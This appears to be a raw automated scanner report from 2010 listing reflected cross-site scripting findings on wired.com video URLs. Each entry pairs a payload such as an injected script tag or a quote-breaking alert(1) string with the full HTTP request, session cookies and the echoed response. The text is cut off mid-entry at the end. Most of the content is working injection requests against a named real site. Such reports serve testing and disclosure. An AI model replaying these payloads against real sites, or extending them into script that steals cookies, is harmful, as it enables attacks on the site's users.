Request
GET /video/latest-videos/featured/1716500189/into-the-unknown/67234708100186432"-alert(1)-"fb2fe4ecb38 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:55:14 GMT Date: Mon, 22 Nov 2010 00:50:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106740
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4efd7"><a>8d6e56f6bcf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video4efd7"><a>8d6e56f6bcf/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29429 Vary: Accept-Encoding Cache-Control: max-age=296 Expires: Mon, 22 Nov 2010 00:49:45 GMT Date: Mon, 22 Nov 2010 00:44:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video4efd7"><a>8d6e56f6bcf ss_latest-videos c_highlights"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload f2def--><script>alert(1)</script>89c0318b3b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videof2def--><script>alert(1)</script>89c0318b3b3/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29464 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:38 GMT Date: Mon, 22 Nov 2010 00:45:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videof2def--><script>alert(1)</script>89c0318b3b3/latest-videos/highlights/1716440574/battle-los-angeles-trailer/676257685001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a817"-alert(1)-"9fa2c73f7d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos4a817"-alert(1)-"9fa2c73f7d7/highlights/1716440574/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:51:33 GMT Date: Mon, 22 Nov 2010 00:46:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106779
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f243"><a>9ea1ab9c052 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos6f243"><a>9ea1ab9c052/highlights/1716440574/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:40 GMT Date: Mon, 22 Nov 2010 00:45:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106750
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos6f243"><a>9ea1ab9c052 c_highlights"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d2a5"-alert(1)-"4c88b33dbf4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights5d2a5"-alert(1)-"4c88b33dbf4/1716440574/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:43 GMT Date: Mon, 22 Nov 2010 00:47:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106782
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca37f"><a>75458ce8857 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/highlightsca37f"><a>75458ce8857/1716440574/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:51:26 GMT Date: Mon, 22 Nov 2010 00:46:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106795
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_highlightsca37f"><a>75458ce8857"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5be1e"-alert(1)-"aa092f4bf91 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/17164405745be1e"-alert(1)-"aa092f4bf91/battle-los-angeles-trailer/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:57 GMT Date: Mon, 22 Nov 2010 00:47:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33a75"-alert(1)-"b39049b1da7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/battle-los-angeles-trailer33a75"-alert(1)-"b39049b1da7/676257685001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:52:43 GMT Date: Mon, 22 Nov 2010 00:48:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106736
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cf06"-alert(1)-"a6eea67ae2b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/battle-los-angeles-trailer/6762576850012cf06"-alert(1)-"a6eea67ae2b HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=297 Expires: Mon, 22 Nov 2010 00:53:16 GMT Date: Mon, 22 Nov 2010 00:48:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106690
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5727"><a>51ba763851b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videob5727"><a>51ba763851b/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29452 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:46:20 GMT Date: Mon, 22 Nov 2010 00:41:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videob5727"><a>51ba763851b ss_latest-videos c_highlights"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 204e8--><script>alert(1)</script>7dd883f11fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video204e8--><script>alert(1)</script>7dd883f11fe/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29487 Vary: Accept-Encoding Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:47:08 GMT Date: Mon, 22 Nov 2010 00:42:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video204e8--><script>alert(1)</script>7dd883f11fe/latest-videos/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64f6a"><a>256869a8c00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos64f6a"><a>256869a8c00/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=297 Expires: Mon, 22 Nov 2010 00:47:21 GMT Date: Mon, 22 Nov 2010 00:42:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos64f6a"><a>256869a8c00 c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7caa1"-alert(1)-"57600af85d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos7caa1"-alert(1)-"57600af85d9/highlights/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:48:26 GMT Date: Mon, 22 Nov 2010 00:43:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106805
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fbc7"-alert(1)-"fc4917c5a16 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights9fbc7"-alert(1)-"fc4917c5a16/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=283 Expires: Mon, 22 Nov 2010 00:49:13 GMT Date: Mon, 22 Nov 2010 00:44:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106832
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af4a6"><a>cc8cfc6cb78 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/highlightsaf4a6"><a>cc8cfc6cb78/1716440574/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=274 Expires: Mon, 22 Nov 2010 00:48:06 GMT Date: Mon, 22 Nov 2010 00:43:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106788
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_highlightsaf4a6"><a>cc8cfc6cb78"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47c96"-alert(1)-"6b39c469add was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/171644057447c96"-alert(1)-"6b39c469add/behind-the-scenes-of-atts-distaster-response-team/648526227001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=292 Expires: Mon, 22 Nov 2010 00:49:50 GMT Date: Mon, 22 Nov 2010 00:44:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106759
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76354"-alert(1)-"5b79ff964c2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
